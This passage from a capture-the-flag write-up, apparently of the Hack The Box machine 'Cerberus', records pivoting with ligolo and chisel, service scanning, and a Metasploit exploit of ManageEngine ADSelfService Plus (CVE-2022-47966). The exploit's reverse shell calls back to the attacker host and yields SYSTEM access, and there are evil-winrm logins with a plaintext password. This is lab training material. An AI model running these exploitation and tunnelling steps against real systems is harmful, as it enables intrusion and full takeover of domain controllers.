│ Name │ Loopback Pseudo-Interface 1 │
│ Hardware MAC │ │
│ MTU │ -1 │
│ Flags │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128 │
│ IPv4 Address │ 127.0.0.1/8 │
└──────────────┴───────────────────────────────┘
[Agent : CERBERUS\\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.0/28
error: file exists
[Agent : CERBERUS\\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.1/32
INFO[0509] Route created.
[Agent : CERBERUS\\matthew@DC] » start --tun ligolo1
[Agent : CERBERUS\\matthew@DC] » INFO[0565] Starting tunnel to CERBERUS\\matthew@DC (86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f) cve_2022_47966
we can see internal port 9251
*Evil-WinRM* PS C:\\Users\\matthew\\Documents> netstat -ano -p TCP | findstr LISTENING
<--SNIP-->
TCP 0.0.0.0:9251 0.0.0.0:0 LISTENING 5548
<--SNIP-->but my nmap result says it’s filtered but nc says otherwise
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -p 9251 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:12 IST
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up (0.00029s latency).
PORT STATE SERVICE
9251/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nc -v 172.16.22.1 9251
dc.cerberus.local [172.16.22.1] 9251 (?) open
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:16 IST
Initiating Connect Scan at 23:16
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed Connect Scan at 23:16, 0.89s elapsed (1 total ports)
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.89s latency).
PORT STATE SERVICE REASON
9251/tcp open unknown syn-ack
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds └─$ nmap -sC -sV -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:18 IST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating SYN Stealth Scan at 23:18
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed SYN Stealth Scan at 23:18, 0.33s elapsed (1 total ports)
Initiating Service scan at 23:18
Scanning 1 service on dc.cerberus.local (172.16.22.1)
Completed Service scan at 23:19, 42.44s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.22.1.
Initiating NSE at 23:19
Completed NSE at 23:19, 19.93s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 4.50s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.32s latency).
PORT STATE SERVICE REASON VERSION
9251/tcp open ssl/http syn-ack ttl 64 Apache Tomcat (language: en)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| ssl-cert: Subject: commonName=cerberus.local/organizationName=CE/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:cerberus.local
| Issuer: commonName=ManageEngine ADSelfService Plus/organizationName=ManageEngine Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-29T19:26:48
| Not valid after: 2043-01-23T19:26:48
| MD5: 520f:7c21:072a:787b:d574:0d10:94ae:11ff
|_SHA-1: 56a4:c917:2b7a:0fad:79b7:390a:affb:bfcf:8a6a:dade
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
|_ssl-date: 2025-08-13T17:49:32+00:00; -1d00h00m05s from scanner time.
| http-methods:
|_ Supported Methods: GET POST
Host script results:
|_clock-skew: -1d00h00m05s
NSE: Script Post-scanning.
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 68.42 seconds
Raw packets sent: 1 (44B) | Rcvd: 12 (2.396KB)We can see adself sign in page
we can see there is unauthenticated RCE for Build prior to 6003
└─$ searchsploit adself
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated) | java/webapps/48739.txt
ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/35331.txt
ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question | php/webapps/35330.txt
ManageEngine ADSelfService Plus 6.1 - CSV Injection | multiple/webapps/49885.py
ManageEngine ADSelfService Plus 6.1 - User Enumeration | windows/remote/50873.py
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure | windows/remote/50904.py
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting | php/webapps/36316.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting | php/webapps/46815.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
and in our case, build is 6210
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ curl -X POST -s -k <https://172.16.22.1:9251/servlet/GetProductVersion> | jq .
{
"DB_TYPE": "postgres",
"BUILD_NUMBER": "6210",
"BUILD_ARCHITECTURE": "64",
"RUNNING_AS_SERVICE": true,
"HA_SUPPORTED": "true",
"PRODUCT_SEQ_NO": "ADSSP-4-DSFJGWB8-1094274869000",
"PRODUCT_NAME": "ManageEngine ADSelfService Plus",
"IS_BUNDLED_DB": "true",
"INSTALLED_AS_SERVICE": true,
"PRODUCT_VERSION": "6.2",
"SERVICE_ACCOUNT_PRIVILEGED": false
}we found the exploit exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
We need a GUID, and for that
there are two ways
The URL above does have useful information. The two parameters passed are
SAMLRequestandRelayState. Both appear to be URL encoded base64.If I URL decode the
SAMLRequest(online tools like urldecoder.org or Burp Decoder will work), and then pass them to a SAML decoder such as this one on samltool.com, it generates XML:<?xml version="1.0" encoding="UTF-8"?> <saml2p:AuthnRequest AssertionConsumerServiceURL="<https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f>" Destination="<https://dc.cerberus.local/adfs/ls/>" ID="_68c55db128eef523034f50338a7aa6db" IssueInstant="2025-08-13T17:48:23.120Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" ProviderName="ManageEngine ADSelfService Plus" Version="2.0" xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"><saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"><https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f></saml2:Issuer><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextClassRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>login as Matthew, and it will redirect you to
https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
Now We need to get the ISSUER_URL from the offline backup
┌──(anurag㉿anurag)-[~/htb/Cerberus/loot/offlinebackup]
└─$ grep ISSUER *
ADSIAMIDPAuthConfigParams.txt:1 ISSUER_URL <http://dc.cerberus.local/adfs/services/trust>and we get the shell on msf
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options
Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):
Name Current Setting Required Description
---- --------------- -------- -----------
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f yes The SAML endpoint GUID
ISSUER_URL <http://dc.cerberus.local/adfs/services/trust> yes The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RELAY_STATE no The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
RHOSTS 172.16.22.1 yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
RPORT 9251 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /samlLogin yes The SAML endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST tun0 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:50564) at 2025-08-15 12:43:42 +0530
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin>
Redo pivot with Chisel
I’ll redo the pivot with chisel
on ichinga linux
www-data@icinga:/tmp$ ./chisel client 10.10.16.7:8000 R:5985:172.16.22.1:5985
2025/08/15 05:44:56 client: Connecting to ws://10.10.16.7:8000
2025/08/15 05:44:59 client: Connected (Latency 252.6704ms)on kali
└─$ ./chisel server -p 8000 --reverse
2025/08/15 11:13:49 server: Reverse tunnelling enabled
2025/08/15 11:13:49 server: Fingerprint IpM4rdlC50EVB042JO5iJdUl2nUrESOojpYZt9fMLL8=
2025/08/15 11:13:49 server: Listening on <http://0.0.0.0:8000>
2025/08/15 11:14:54 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listeningwe get windoows shell
└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\matthew\\Documents>for double pivoit I will upload the chisel to windows and
*Evil-WinRM* PS C:\\temp> ./chisel_win.exe client 10.10.16.7:8000 R:socks
chisel_win.exe : 2025/08/14 23:02:05 client: Connecting to ws://10.10.16.7:8000
+ CategoryInfo : NotSpecified: (2025/08/14 23:0...10.10.16.7:8000:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2025/08/14 23:02:08 client: Connected (Latency 251.2766ms)on kali
2025/08/15 11:32:03 server: session#2: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/15 11:32:03 server: session#2: tun: proxy#R:127.0.0.1:1080=>socks: ListeningNow i can visit https://127.0.0.1:9251 with FoxyProxy to tunnel Firefox over 1080
Now let’s try again with msfconsole
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options
Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):
Name Current Setting Required Description
---- --------------- -------- -----------
GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f yes The SAML endpoint GUID
ISSUER_URL <http://dc.cerberus.local/adfs/services/trust> yes The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
Proxies socks5:127.0.0.1:1080 no A proxy chain of format type:host:port[,type:host:port][...]
RELAY_STATE no The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
RHOSTS dc.cerberus.local yes The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
RPORT 9251 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /samlLogin yes The SAML endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.10.16.7 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.16.7 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:58805) at 2025-08-15 12:18:31 +0530
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> I think the issue was with the payload
and we found root.txt
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> cd C:\\Users\\
PS C:\\Users> dir
Directory: C:\\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2023 2:44 AM adfs_svc$
d----- 1/30/2023 4:14 AM adfs_svc$.CERBERUS
d----- 11/29/2022 4:24 AM Administrator
d----- 1/22/2023 11:22 AM matthew
d-r--- 4/10/2020 10:49 AM Public
PS C:\\Users> cd Administrator
PS C:\\Users\\Administrator> cd Desktop
PS C:\\Users\\Administrator\\Desktop> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/14/2025 10:38 PM 34 root.txt Last updated